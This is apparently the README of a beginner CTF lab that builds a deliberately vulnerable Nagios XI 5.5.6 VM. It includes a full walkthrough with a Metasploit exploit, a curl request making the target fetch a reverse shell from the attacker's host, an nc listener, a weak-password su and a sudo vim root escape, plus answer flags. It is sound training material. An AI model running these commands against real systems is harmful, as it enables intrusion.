A beginner-friendly CTF box featuring a vulnerable Nagios XI instance, weak credentials, and a classic sudo misconfiguration for privilege escalation.
_ __ __
/ | / /___ _____ _____ ____ / /______
/ |/ / __ `/ __ `/ __ `/ _ \/ __/ ___/
/ /| / /_/ / /_/ / /_/ / __/ /_(__ )
/_/ |_/\__,_/\__, /\__, /\___/\__/____/
/____//____/
| Detail | Value |
|---|---|
| Difficulty | Easy |
| Points | 20 |
| OS | Ubuntu 20.04 LTS |
| Flags | 2 (local.txt + proof.txt) |
| Author | 0xmmn |
- Network enumeration and service discovery
- Web application vulnerability identification
- Exploiting known CVEs (Nagios XI)
- Linux privilege escalation via sudo misconfigurations
Provisions a fully configured VirtualBox VM with one command.
Prerequisites: VirtualBox + Vagrant
git clone https://github.com/momenbasel/naggets.git
cd naggets
vagrant upThe box takes 5-10 minutes to provision. When done, it prints the access info:
HTTP: http://localhost:8888 (or the DHCP-assigned private IP)
SSH: vagrant ssh
To find the private IP for scanning:
vagrant ssh -c "hostname -I"Run the build script on any fresh Ubuntu 20.04 installation (VM, cloud instance, WSL2).
git clone https://github.com/momenbasel/naggets.git
cd naggets
sudo bash provision/build.shIf someone shared a pre-built .ova file with you:
VBoxManage import naggets-ctf.ovaTo build and export an OVA yourself (after vagrant up):
chmod +x provision/export-ova.sh
./provision/export-ova.sh| Port | Service | Purpose |
|---|---|---|
| 22 | SSH | Remote access |
| 80 | HTTP | Nagios XI web interface |
Outbound traffic is restricted by iptables. Only DNS (53), HTTP (80), SSH (22), and ICMP are allowed out. IPv6 is disabled.
- Treat this as a black-box engagement - enumerate everything
- Two flags to find:
local.txt- proves you got a user shellproof.txt- proves you got root
- Submit the flag contents (MD5 hashes) as proof
- The intended path does not require brute-forcing the root password
Work through these one at a time. Only open the next hint if you are stuck.
Hint 1 - Enumeration
Run a full port scan and identify what is running on port 80. The web application version matters.
nmap -sC -sV -p- <target-ip>Hint 2 - Web Application
The web application is Nagios XI. What version is it? Search for known CVEs affecting that specific version. There is at least one that gives you remote code execution without authentication.
Hint 3 - Initial Access
Look up CVE-2018-15708 and CVE-2018-15710. Metasploit has modules for both. There is also a standalone Python exploit available on GitHub - search for "nagios xi 5.5.6 rce".
Hint 4 - Lateral Movement
Once you have a shell as www-data or nagios, look at what users exist on the system. One of them has a very weak password - the username IS the password. Try su to switch to that user.
Hint 5 - Privilege Escalation
Check what the user can run with sudo -l. If a text editor can be run as root, it can spawn a root shell. Check GTFOBins.
SPOILER WARNING - Full solution below. Try the hints first.
Click to reveal full walkthrough
Discover the target and scan for open services:
nmap -sC -sV -p- <target-ip>Results:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu
80/tcp open http Apache httpd 2.4.41
Browse to http://<target-ip>/ - you will be redirected to the Nagios XI login page at /nagiosxi/login.php. The footer reveals the version: Nagios XI 5.5.6.
Run directory enumeration to find additional paths:
gobuster dir -u http://<target-ip>/nagiosxi/ -w /usr/share/wordlists/dirb/common.txtNotable finds:
/nagiosxi/login.php- login form/nagiosxi/includes/- directory listing in some cases/nagiosxi/api/- REST API endpoint
Nagios XI 5.5.6 is vulnerable to multiple CVEs:
- CVE-2018-15708 - Unauthenticated remote code execution via
magpie_debug.php - CVE-2018-15710 - Root privilege escalation within Nagios XI
Option A: Metasploit
msfconsole -q
use exploit/linux/http/nagios_xi_magpie_debug
set RHOSTS <target-ip>
set LHOST <your-ip>
runThis gives you a shell as the nagios or www-data user.
Option B: Manual exploitation
The vulnerability is in /nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php which accepts a URL parameter and can be abused for SSRF/RCE.
# Check if the endpoint exists
curl -s "http://<target-ip>/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php"For a manual reverse shell, set up a listener and exploit the file inclusion:
# Terminal 1 - listener
nc -lvnp 4444
# Terminal 2 - trigger reverse shell
curl "http://<target-ip>/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php?url=http://<your-ip>/shell.php"Option C: Public exploit scripts
Search GitHub for nagios-xi-5.5.6-exploit - several standalone Python scripts exist.
Once you catch a reverse shell, stabilize it:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z to background
stty raw -echo; fg
export TERM=xtermCheck what users exist:
cat /etc/passwd | grep -v nologin | grep -v falseOutput shows users: root, cookies, rasta
Try switching to cookies with the obvious password:
su cookies
# Password: cookiesYou are now cookies. Grab the first flag:
cat ~/local.txteb0d623fa3ebf4ab0c39a9495198eaca
Check what cookies can do with sudo:
sudo -lUser cookies may run the following commands on nuggets:
(root) NOPASSWD: /usr/bin/vim
The user can run vim as root without a password. This is a textbook GTFOBins escape:
sudo vim -c ':!/bin/bash'You now have a root shell. Grab the final flag:
cat /root/proof.txtf411d87894b17b94b2df0c612fc978d9
Enumeration (nmap)
|
v
Nagios XI 5.5.6 identified
|
v
CVE-2018-15708 (magpie_debug.php RCE)
|
v
Shell as www-data/nagios
|
v
su cookies (password = "cookies")
|
v
local.txt --> eb0d623fa3ebf4ab0c39a9495198eaca
|
v
sudo vim -c ':!/bin/bash' (GTFOBins)
|
v
proof.txt --> f411d87894b17b94b2df0c612fc978d9
| Flag | Hash | Location |
|---|---|---|
| local.txt | eb0d623fa3ebf4ab0c39a9495198eaca |
/home/cookies/local.txt |
| proof.txt | f411d87894b17b94b2df0c612fc978d9 |
/root/proof.txt |
# Destroy the VM
vagrant destroy -f
# Or just stop it
vagrant haltAll challenge parameters are defined as variables at the top of provision/build.sh:
| Variable | Default | Description |
|---|---|---|
NAGIOS_VERSION |
5.5.6 |
Nagios XI version to install |
USER_MAIN |
cookies |
Exploitable user account |
USER_MAIN_PASS |
cookies |
Weak password for that user |
FLAG_LOCAL |
eb0d63... |
local.txt flag hash |
FLAG_ROOT |
f411d8... |
proof.txt flag hash |
Change the flags before distributing so players can't just read this README for the answer.
naggets/
Vagrantfile # VM definition and provisioning config
provision/
build.sh # Main build script (runs as root)
export-ova.sh # Export VM as distributable OVA
files/
motd # Login banner
setup_nagios.py # Nagios XI setup wizard automation
LICENSE
README.md
Nagios XI download fails
The tarball URL may go offline. Download xi-5.5.6.tar.gz manually from Nagios Assets and place it in the project root as nagiosxi-5.5.6.tar.gz. The build script checks for a local copy in /vagrant/ as fallback.
VM hangs during provisioning
Nagios XI fullinstall takes 3-5 minutes and installs MySQL, SNMP, and various dependencies. If it appears stuck, wait. If it fails, SSH in with vagrant ssh and check /tmp/nagiosxi/ logs.
Port 8888 not responding
Ensure VirtualBox port forwarding is working. Alternatively, use the private network IP:
vagrant ssh -c "hostname -I"
curl http://<private-ip>/nagiosxi/- Original concept: 0xmmn (2020)
- Nagios XI: Nagios Enterprises
- Privesc technique: GTFOBins
MIT - See LICENSE for details.